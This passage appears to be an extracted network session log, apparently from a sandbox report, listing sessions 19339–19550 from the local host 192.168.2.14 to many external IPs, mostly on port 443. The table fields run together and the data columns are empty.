                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19339192.168.2.1441188134.65.45.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19340192.168.2.1459384104.73.217.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19341192.168.2.1437920105.100.98.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19342192.168.2.1459464139.57.40.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19343192.168.2.145705489.206.178.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19344192.168.2.143477653.57.141.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19345192.168.2.1435774126.179.145.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19346192.168.2.1440020200.150.224.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19347192.168.2.1452910149.12.251.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19348192.168.2.1444998179.184.28.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19349192.168.2.1438384135.132.11.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19350192.168.2.1449118102.89.5.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19351192.168.2.145596694.221.40.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19352192.168.2.144178077.128.236.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19353192.168.2.1452706209.210.126.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19354192.168.2.143737644.25.59.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19355192.168.2.1460178177.117.202.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19356192.168.2.1434604149.117.154.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19357192.168.2.1453762150.201.196.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19358192.168.2.144472218.100.129.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19359192.168.2.1460254177.4.63.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19360192.168.2.1456122103.47.239.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19361192.168.2.144491850.175.209.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19362192.168.2.143472291.62.211.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19363192.168.2.144823448.108.133.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19364192.168.2.1459466195.35.190.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19365192.168.2.1454036182.199.163.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19366192.168.2.1460052201.100.228.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19367192.168.2.14433745.63.189.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19368192.168.2.143821294.154.55.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19369192.168.2.145699643.79.192.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19370192.168.2.1439252110.240.230.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19371192.168.2.145774227.203.193.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19372192.168.2.145958499.192.46.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19373192.168.2.144652669.13.242.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19374192.168.2.143982225.40.165.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19375192.168.2.1457994161.23.117.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19376192.168.2.144143837.139.199.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19377192.168.2.144946225.54.3.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19378192.168.2.1458878172.65.106.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19379192.168.2.1449580100.239.229.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19380192.168.2.1444046115.251.113.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19381192.168.2.146064052.62.42.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19382192.168.2.1445210109.36.120.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19383192.168.2.1451920103.239.241.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19384192.168.2.144566045.203.161.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19385192.168.2.145145692.63.215.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19386192.168.2.1460598210.209.128.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19387192.168.2.1438000129.159.136.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19388192.168.2.145080875.58.142.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19389192.168.2.1438160184.113.242.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19390192.168.2.1440822113.202.94.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19391192.168.2.144496678.42.26.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19392192.168.2.144107024.31.38.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19393192.168.2.143301666.90.65.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19394192.168.2.1442910111.226.96.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19395192.168.2.145841069.131.212.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19396192.168.2.1458328166.111.77.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19397192.168.2.1458190205.137.108.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19398192.168.2.143973675.74.26.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19399192.168.2.1436394180.35.218.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19400192.168.2.1451372205.169.226.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19401192.168.2.1433698120.192.237.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19402192.168.2.1447680101.68.161.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19403192.168.2.1436458210.213.58.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19404192.168.2.1452264172.249.178.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19405192.168.2.1442370147.79.23.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19406192.168.2.144453436.143.78.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19407192.168.2.1433866160.1.35.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19408192.168.2.1433422118.124.22.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19409192.168.2.1436006193.108.74.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19410192.168.2.144796259.168.105.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19411192.168.2.145409666.107.45.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19412192.168.2.1451512102.229.9.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19413192.168.2.1447442129.144.120.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19414192.168.2.1446966206.131.130.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19415192.168.2.1444756143.228.171.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19416192.168.2.145684681.185.249.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19417192.168.2.1459536176.223.161.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19418192.168.2.1451096160.173.6.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19419192.168.2.144577085.72.38.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19420192.168.2.1435810104.161.131.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19421192.168.2.1445806119.42.254.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19422192.168.2.1451016151.33.14.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19423192.168.2.1460042129.172.107.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19424192.168.2.1458434144.54.137.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19425192.168.2.1443954110.105.44.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19426192.168.2.1450082218.238.63.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19427192.168.2.145740681.76.178.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19428192.168.2.1447318190.245.255.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19429192.168.2.144627025.146.34.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19430192.168.2.143475895.190.29.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19431192.168.2.1460378205.163.203.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19432192.168.2.1437314157.101.151.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19433192.168.2.143285074.179.181.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19434192.168.2.1433818200.133.46.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19435192.168.2.1447392198.100.72.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19436192.168.2.14563749.71.228.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19437192.168.2.1434510103.246.63.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19438192.168.2.1452556218.39.240.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19439192.168.2.1434398205.246.213.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19440192.168.2.144157078.177.97.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19441192.168.2.1440046179.37.151.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19442192.168.2.145670437.45.71.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19443192.168.2.14561489.3.21.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19444192.168.2.146070443.219.49.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19445192.168.2.143450250.143.82.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19446192.168.2.144882666.23.170.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19447192.168.2.146087032.65.154.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19448192.168.2.145440031.196.198.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19449192.168.2.144074074.45.36.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19450192.168.2.145159060.241.227.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19451192.168.2.1449490112.108.3.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19452192.168.2.1455854117.9.206.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19453192.168.2.1446958222.141.95.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19454192.168.2.14347725.41.27.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19455192.168.2.1456270143.180.101.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19456192.168.2.145193842.136.112.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19457192.168.2.145786417.108.2.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19458192.168.2.1453248167.98.103.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19459192.168.2.143765439.255.172.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19460192.168.2.143524223.80.17.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19461192.168.2.1457746152.143.57.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19462192.168.2.145080619.37.239.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19463192.168.2.144537079.211.144.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19464192.168.2.144874854.120.69.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19465192.168.2.1441996137.0.117.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19466192.168.2.1438526133.175.72.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19467192.168.2.1452706117.87.40.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19468192.168.2.144060099.212.133.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19469192.168.2.1441356189.189.10.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19470192.168.2.144948499.111.164.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19471192.168.2.145054899.108.196.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19472192.168.2.1440780113.197.89.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19473192.168.2.1454468160.34.58.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19474192.168.2.144192679.183.224.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19475192.168.2.143405847.13.118.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19476192.168.2.1440476169.92.201.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19477192.168.2.1437570154.77.187.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19478192.168.2.143598880.8.203.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19479192.168.2.1458112183.88.126.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19480192.168.2.1437866109.153.137.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19481192.168.2.144259075.113.229.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19482192.168.2.1435680187.140.118.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19483192.168.2.1436584157.136.182.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19484192.168.2.1447204110.117.174.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19485192.168.2.1439506132.72.217.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19486192.168.2.1434170218.247.9.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19487192.168.2.1434920170.253.80.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19488192.168.2.1450380101.213.30.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19489192.168.2.144569283.194.135.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19490192.168.2.145482473.103.13.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19491192.168.2.144760283.245.141.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19492192.168.2.1437880183.137.149.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19493192.168.2.1434404112.62.193.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19494192.168.2.1445518184.19.92.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19495192.168.2.1457088118.43.84.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19496192.168.2.1459066122.32.235.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19497192.168.2.144422443.28.220.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19498192.168.2.1438088126.210.57.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19499192.168.2.1450284181.205.8.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19500192.168.2.1434456157.100.171.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19501192.168.2.145002296.181.94.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19502192.168.2.144466825.151.183.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19503192.168.2.145925665.252.176.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19504192.168.2.1437600169.163.49.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19505192.168.2.1449508130.156.157.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19506192.168.2.143831040.46.159.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19507192.168.2.144247267.159.172.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19508192.168.2.1440362126.40.140.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19509192.168.2.1438288124.87.36.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19510192.168.2.1449744144.140.50.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19511192.168.2.143374619.195.112.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19512192.168.2.145923488.166.54.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19513192.168.2.1451566196.2.0.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19514192.168.2.143663446.173.137.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19515192.168.2.145826465.228.117.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19516192.168.2.145321072.41.120.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19517192.168.2.144709898.147.43.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19518192.168.2.144800497.40.168.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19519192.168.2.1454436146.138.228.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19520192.168.2.1435048138.106.207.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19521192.168.2.144904659.106.211.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19522192.168.2.1436346216.28.247.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19523192.168.2.1451866191.116.227.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19524192.168.2.1435908201.116.147.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19525192.168.2.144219278.131.184.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19526192.168.2.1441272212.39.157.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19527192.168.2.1455394177.55.247.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19528192.168.2.144474085.189.20.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19529192.168.2.1457000148.235.192.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19530192.168.2.144368057.41.93.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19531192.168.2.1455882125.233.231.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19532192.168.2.1444548126.229.134.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19533192.168.2.14577424.28.220.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19534192.168.2.144303089.161.197.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19535192.168.2.1444116216.105.173.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19536192.168.2.1453940101.254.87.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19537192.168.2.144674650.8.108.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19538192.168.2.1435434135.56.86.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19539192.168.2.1439290223.246.222.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19540192.168.2.1438850149.227.229.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19541192.168.2.1434882155.195.68.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19542192.168.2.1456944219.33.220.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19543192.168.2.1448326121.137.26.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19544192.168.2.1449292222.74.187.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19545192.168.2.1435310148.163.148.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19546192.168.2.144459680.151.112.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19547192.168.2.1451720110.88.18.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19548192.168.2.1438398168.15.118.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19549192.168.2.1455920112.248.10.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19550192.168.2.1457448144.23.26.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
